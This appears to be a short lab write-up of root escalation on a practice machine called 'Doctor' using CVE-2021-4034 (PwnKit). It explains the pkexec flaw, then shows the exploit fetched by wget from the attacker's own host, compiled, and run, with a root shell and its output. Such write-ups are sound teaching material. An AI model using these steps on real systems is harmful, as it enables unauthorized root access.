InfoSec LAB

Doctor_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit):

I found an exploit online

Exploitation

web@doctor:/dev/shm/$ wget http://10.10.14.10:8000/kernelbuster/CVE-2021-4034.tar.gz
web@doctor:/dev/shm/$ tar -xvf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

web@doctor:/dev/shm/$ tar -xvf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
 
web@doctor:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compile

web@doctor:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
doctor
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.209  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:a8d6  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:a8:d6  txqueuelen 1000  (Ethernet)
        RX packets 161736  bytes 21518480 (21.5 MB)
        RX errors 0  dropped 83  overruns 0  frame 0
        TX packets 167268  bytes 161821471 (161.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 724046  bytes 190390893 (190.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 724046  bytes 190390893 (190.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks